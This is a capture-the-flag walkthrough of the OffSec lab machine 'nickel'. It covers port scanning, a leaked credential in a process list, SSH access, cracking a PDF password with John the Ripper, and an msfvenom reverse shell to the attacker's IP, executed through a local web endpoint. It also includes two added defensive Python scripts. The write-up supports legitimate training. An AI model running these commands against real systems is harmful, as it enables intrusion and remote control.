
nickel Walkthrough

Platform: Offsec | PG Practice
Difficulty: Intermediate
OS: Windows
Author: Pawan Kumar (Vulntricks)


Scanning

PORT      STATE SERVICE       REASON          VERSION
21/tcp open ftp syn-ack ttl 125 FileZilla ftpd 0.9.60 beta
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
22/tcp open ssh syn-ack ttl 125 OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey:
| 3072 86:84:fd:d5:43:27:05:cf:a7:f2:e9:e2:75:70:d5:f3 (RSA)
| ssh-rsa [key omitted]
| 256 9c:93:cf:48:a9:4e:70:f4:60:de:e1:a9:c2:c0:b6:ff (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDJYE805huwKUl0fJM8+N9Mk7GUQeEEc5iA/yYqgxE7Bwgz4h5xufRONkR6bWxcxu8/AHslwkkDkjRKNdr4uFzY=
| 256 00:4e:d7:3b:0f:9f:e3:74:4d:04:99:0b:b1:8b:de:a5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIL8cLYuHBTVFfYPb/YzUIyT39bUzA/sPDFEC/xChZyZ4
80/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Site doesn't have a title.
| http-methods:
|_ Supported Methods: GET
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 125
3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
|_ssl-date: 2025-10-11T20:25:45+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: NICKEL
| NetBIOS_Domain_Name: NICKEL
| NetBIOS_Computer_Name: NICKEL
| DNS_Domain_Name: nickel
| DNS_Computer_Name: nickel
| Product_Version: 10.0.18362
|_ System_Time: 2025-10-11T20:24:44+00:00
| ssl-cert: Subject: commonName=nickel
| Issuer: commonName=nickel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-10T20:19:58
| Not valid after: 2026-04-11T20:19:58
| MD5: ba53:9831:6e0d:8948:9314:f277:538e:7401
| SHA-1: c4ce:3137:8bed:b8c4:bd28:46ee:abdd:979a:bf1f:4705
| -----BEGIN CERTIFICATE-----
| MIIC0DCCAbigAwIBAgIQHhERqiYFR6lF+j5b7iWPDDANBgkqhkiG9w0BAQsFADAR
| MQ8wDQYDVQQDEwZuaWNrZWwwHhcNMjUxMDEwMjAxOTU4WhcNMjYwNDExMjAxOTU4
| WjARMQ8wDQYDVQQDEwZuaWNrZWwwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
| AoIBAQDCXZgj7GrKKmqiIR+X8wdw+QLifAN5A5oTbcawzniofJDBT1YY+cnJdQKB
| q8/tDLH/3vxJMR4CdGNtTb2zcIMXZrDUjCRpht6BrcI4IMlcrrxJdeGerC+ipPEx
| AidFy9it4Tt1gsUv+ESn6e2aLB7UIauSvz80JeuW2D3VMH4m64lhP+KXbluAY7jN
| E/B58kkOBnSg4AhRuIoRNk9qG01QLUqC3drxLkOeBw3KA1WikNNg1fdJ8P/B5L7T
| P1uTju8IMpbwQFxYKrhbB6vkIXNwbOHEeMdTpwlXdamA9H/3SaZJPukkpGMQ69nO
| gIKf2LgZ5tZU5K9dgrobMvp9F7s9AgMBAAGjJDAiMBMGA1UdJQQMMAoGCCsGAQUF
| BwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsFAAOCAQEAr3ylKEAEQ2P9kF71
| M2L0Tyqnq2NzFmoo7E6fJTvzPbqxgkVDH2mhj4ufYjBrypXlvsgDvqlE8t43sOGE
| dmNVDJ273A8h3/CbL0OflC5NhzVzPPpdwnkNnkhS39bh1zlAEAADytPVukvfnJAO
| 7AFB2pJf9/G8sKx42R5rVT3tAEyAhiuT5B0lncHGFZWvsgdQxC3IKFF2p7hi5NnT
| iLTu/YzoSA12GTR6wNg0lT+Fmsy5QLDWJMx//dTnlYrD9AzN/LLyM6Ve7qrkIsFM
| TQTM14yewdKaBFYJlfgBZLDypsvVf66mE7L7FyeKb9e5UZZcySkCLArtu3aPJZGP
| g86U7g==
|_-----END CERTIFICATE-----
5040/tcp open unknown syn-ack ttl 125
7680/tcp open pando-pub? syn-ack ttl 125
8089/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Supported Methods: GET
|_http-favicon: Unknown favicon MD5: 9D1EAD73E678FA2F51A70A933B0BF017
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
33333/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Supported Methods: GET
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-favicon: Unknown favicon MD5: 76C5844B4ABE20F72AA23CBE15B2494E
|_http-title: Site doesn't have a title.
49664/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2025-10-11T20:24:48
|_ start_date: N/A
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 45048/tcp): CLEAN (Couldn't connect)
| Check 2 (port 24613/tcp): CLEAN (Couldn't connect)
| Check 3 (port 41336/udp): CLEAN (Failed to receive data)
| Check 4 (port 17980/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
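The scan above is nmap's normal output with --reason, which is easy to skim once but awkward to track across many hosts. The following Python is an added example (not from the original walkthrough) that parses that format into records and flags the findings a reviewer would note here: FTP, an RDP certificate whose subject equals its issuer, HTTP.sys listeners on non-standard ports, and SMB signing not being required. SAMPLE_SCAN is a trimmed, constructed copy of the page's scan, and the regex assumes the `port/proto state service reason [ttl N] version` column layout.

```python
"""Parse nmap normal output (as shown in the scan above) into structured
records and flag review-worthy findings.  Added example: SAMPLE_SCAN is a
trimmed, constructed copy of the page's scan, not a new scan."""
import re
from dataclasses import dataclass, field

SAMPLE_SCAN = """\
PORT      STATE SERVICE       REASON          VERSION
21/tcp open ftp syn-ack ttl 125 FileZilla ftpd 0.9.60 beta
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
22/tcp open ssh syn-ack ttl 125 OpenSSH for_Windows_8.1 (protocol 2.0)
80/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
445/tcp open microsoft-ds? syn-ack ttl 125
3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
| ssl-cert: Subject: commonName=nickel
| Issuer: commonName=nickel
|_Not valid after: 2026-04-11T20:19:58
33333/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
"""

# Assumed column layout: port/proto state service reason [ttl N] version
PORT_RE = re.compile(
    r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s+(\S+)(?: ttl \d+)?\s*(.*)$"
)


@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str
    script_lines: list = field(default_factory=list)  # NSE output for this port


def parse_nmap(text):
    """Return (services, host_script_lines) from nmap normal output."""
    services, host_scripts = [], []
    current, in_host_scripts = None, False
    for line in text.splitlines():
        if line.startswith("Host script results"):
            in_host_scripts, current = True, None
            continue
        m = PORT_RE.match(line)
        if m:
            current = Service(int(m.group(1)), m.group(2), m.group(3),
                              m.group(4), m.group(6).strip())
            services.append(current)
            continue
        if line.startswith("|"):
            body = line.lstrip("|_ ").strip()   # drop the NSE tree prefix
            if in_host_scripts:
                host_scripts.append(body)
            elif current is not None:
                current.script_lines.append(body)
    return services, host_scripts


def assess(services, host_scripts):
    """Flag the findings a defender would raise from this scan."""
    findings = []
    for s in services:
        if s.name == "ftp":
            findings.append(f"{s.port}/{s.proto}: FTP exposes credentials in cleartext")
        if s.name == "ms-wbt-server":
            cn = {}
            for l in s.script_lines:
                if l.startswith(("ssl-cert: Subject:", "Issuer:")):
                    key = "issuer" if l.startswith("Issuer") else "subject"
                    cn[key] = l.split("commonName=", 1)[1]
            if "subject" in cn and cn["subject"] == cn.get("issuer"):
                findings.append(f"{s.port}/{s.proto}: RDP certificate is self-signed (CN={cn['subject']})")
        if s.name == "http" and "HTTPAPI" in s.version and s.port not in (80, 443):
            findings.append(f"{s.port}/{s.proto}: HTTP.sys listener on a non-standard port (undocumented service surface)")
    if any("signing enabled but not required" in l.lower() for l in host_scripts):
        findings.append("445/tcp: SMB signing not required (NTLM relay risk)")
    return findings


if __name__ == "__main__":
    svcs, host = parse_nmap(SAMPLE_SCAN)
    for s in svcs:
        print(f"{s.port}/{s.proto} {s.state} {s.name} {s.version}")
    for f in assess(svcs, host):
        print("FINDING:", f)
```

Running it prints one line per open port followed by the four findings; feeding it the full scan instead of SAMPLE_SCAN works the same way, since lines that are neither a port row nor an NSE `|` line are ignored.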

Enumeration

We'll start our enumeration with the web services, as always.

Enumerating HTTP ports 8089 and 33333

Looking at the website on port 8089, it shows three links.

Looking at the source code, it redirects to port 33333.

When trying a GET request we got an error.

So I changed the method to POST and got this response.

According to the error it now requires a Content-Length header, so we add one.

So I tested all the endpoints, and got a response from the running-processes endpoint.

└─$ curl -X POST -i http://nickel:33333/list-running-procs -H "Content-Length: 0"


And in that process list I found this:

So now we have a user and password: ariah:Tm93aXNlU2xvb3BUaGVvcnkxMzkK
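The credential above was sitting in a process's command line, where any local user who can list processes can read it. As an added example (not part of the walkthrough), the following Python runs a small check over a constructed list of process command lines, flagging password-style flags and `user:base64` tokens that decode to printable text. SAMPLE_CMDLINES, the svc_poll account and the CorrectHorse42 value are all constructed for the example, not taken from the target.

```python
"""Flag credentials exposed in process command lines.  Added example: the
command lines, the svc_poll account and the CorrectHorse42 value are all
constructed for this example, not taken from the target."""
import base64
import re

_B64_SECRET = base64.b64encode(b"CorrectHorse42").decode()   # constructed sample value

# Constructed sample of process command lines (e.g. from a process inventory).
SAMPLE_CMDLINES = [
    r"C:\Windows\System32\svchost.exe -k netsvcs",
    r"C:\Tools\poller.exe --server 10.0.0.5 --auth svc_poll:" + _B64_SECRET,
    r"C:\Tools\backup.exe --password Winter2024! --dest D:\bak",
    r"C:\Program Files\App\app.exe --config C:\ProgramData\app.json",
]

# user:base64blob tokens (8+ base64 chars, optional padding, token-final)
CRED_RE = re.compile(r"\b([A-Za-z0-9_.-]+):([A-Za-z0-9+/]{8,}={0,2})(?=\s|$)")
# password-style flags followed by a value
FLAG_RE = re.compile(r"(?:^|\s)(?:-p|--password|--pass|/pass)[ =:](\S+)", re.I)


def try_b64(token):
    """Return the decoded text if token is valid base64 of printable ASCII, else None."""
    if len(token) % 4:
        return None
    try:
        text = base64.b64decode(token, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None
    text = text.strip()
    return text if text and text.isprintable() else None


def scan_cmdlines(lines):
    """Return (kind, user, secret, line) tuples for each exposed credential."""
    findings = []
    for line in lines:
        for m in FLAG_RE.finditer(line):
            findings.append(("flag", None, m.group(1), line))
        for m in CRED_RE.finditer(line):
            decoded = try_b64(m.group(2))
            if decoded is not None:
                findings.append(("base64", m.group(1), decoded, line))
    return findings


if __name__ == "__main__":
    # Mask the secret when reporting; the finding is that it is exposed, not its value.
    for kind, user, secret, line in scan_cmdlines(SAMPLE_CMDLINES):
        who = f" user={user}" if user else ""
        print(f"[{kind}]{who} secret={secret[:2]}*** in: {line}")
```

The base64 branch deliberately requires a multiple-of-4 length and printable output, so ordinary tokens such as paths or hostnames do not trip it; a real deployment would feed it the command lines from a process inventory and escalate any hit as a credential that needs rotating and moving out of arguments.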


Initial Access

I tried the discovered user and password, but it was failing, so I tried decoding the password.

Decoding it gave a plaintext password, which worked for logging in over SSH.

Privilege Escalation

Post-Exploitation Enumeration

While going through the files and folders manually, I found a folder named ftp containing a PDF.

Transferred it to my machine using scp.

PS C:\ftp> scp .\Infrastructure.pdf kali@192.168.45.170:/home/kali/Documents/offsec/pg_practice/nickel/

When I tried opening it, the PDF was locked with a password.

So I used pdf2john to extract the password hash and cracked it with John the Ripper.

pdf2john Infrastructure.pdf > pdf.hash
john --wordlist=/usr/share/wordlists/rockyou.txt pdf.hash


I was able to unlock the PDF and found this inside it, but it seems irrelevant. Rabbit hole?

Since the document mentions HTTP, is it possible there is an internal server running that isn't visible from the outside scan?

I found that port 80 is also running. So I tried accessing it with curl from the system, and after some trial and error was able to work out what it does.

Escalation

Created a reverse shell using msfvenom

└─$ msfvenom --payload windows/x64/shell_reverse_tcp LHOST=192.168.45.170 LPORT=443 -f exe > rev2.exe

Downloaded it to, and executed it on, the victim machine

curl http://127.0.0.1/?C:\Users\ariah\rev2.exe
